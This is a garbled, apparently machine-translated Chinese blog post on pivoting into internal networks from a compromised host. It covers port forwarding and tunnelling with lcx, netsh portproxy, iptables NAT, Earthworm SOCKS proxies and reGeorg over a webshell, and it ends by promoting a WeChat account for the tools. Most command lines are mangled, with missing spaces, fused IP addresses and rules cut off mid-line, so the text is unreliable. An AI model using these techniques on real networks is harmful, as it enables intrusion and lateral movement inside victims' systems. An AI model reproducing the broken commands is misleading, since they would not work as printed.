作者: yjddrjb
备受信息安全折磨的新白帽子,谢谢你的关注
本实验仅用于信息防御教育,请勿用于其他用途
内部网透明lcxnetshiptablesEarthworm端口复用reGeorg总结
内部网贯通
虽然想从外部网渗透内部网主机,但是由于内部网的很多主机不直接连接外部网,所以进行通路的构筑
(假设您已经控制了一台主机,并通过该主机渗透到其他内部网主机。)
win端口传输: lcx.exe netsh
linux端口转发: portmap iptables
多平台: Earthworm
端口重用: reGeorg
lcx win平台的旧工具。
好用是好用,但被放进了家人的桶里)
//端口转发(listen和slave ) lcx.exe -listen 8080 8081 //个端口lcx.exe-slave 192.168.1.1288080192.168.1.13181818888
运行cmd
要在//xp上安装IPv6 netsh接口IPv6 install并打开防火墙,必须释放tcp端口
//设置规则v4tov4以访问192.168.1.132:6666端口192.168.1.128:3389端口netshinterfaceportproxysetv4to v4 liv4
netshinterfaceportproxydeletev4to v4 listen address=192.168.1.132 listen port=3389显示现有配置
netshinterfaceportproxyshowv4to v4 netshinterfaceportproxyshowalliptableslinux的端口转发
打开内核转发
echo1/proc/sys/net/IP v4/IP _ forward sysctl-p配置端口传输
//前锋代理/192.168.1 .访问131:8888 192.168.1.128:80 iptables-tnat-a prerouting-- dst 192.168.1.131-ptcp ostrouting-- dst 192.168.1.128-ptcp-- dport 80-js NAT-- to-source 192.168.1 start /。 iptables-tnat-a prerouting-ptcp-mtcp-- dport 8888-jdn at---to-destination 192.168.1.128:80 iptables -。 16-d 192.168.1.128-ptcp-mtcp-- dport 80-js NAT-- to-source 192.168.1.131 /本地端口之间得iptables-tnat-a pap
//ew_win32.exe-ssocksd-l8082//直接成为socks5代理服务器//ew _ win32.exe-src socks-l 8081-e 8082//本地8082端口等待内部网访问本机8081时,将内部网ew _ win32.exe-SRS socks-d 192.168.1.1-e 8082//内部网主体传送到外部网络8082端口
(服务器只开放80个端口,适合从80个端口进出数据。)
(因为有很好的隐藏后门,所以不用再开设端口了) ) )。
是用reGeorg Python2.7编写的工具,与Webshell合作从80个端口进行传输。
支持多种语言
3359 github.com/sense post/re Georg
python2 reGeorgSocksProxy.py -l监听地址-p本地服务监听的端口-u Webshell地址python2regeorgsocksproxy.py-l 192.168.u 总结p后,可以在浏览器中添加代理,也可以使用socks5工具等配置全局代理。
取得工具
微信公众号: XGyjddrjb
回复:内网穿透工具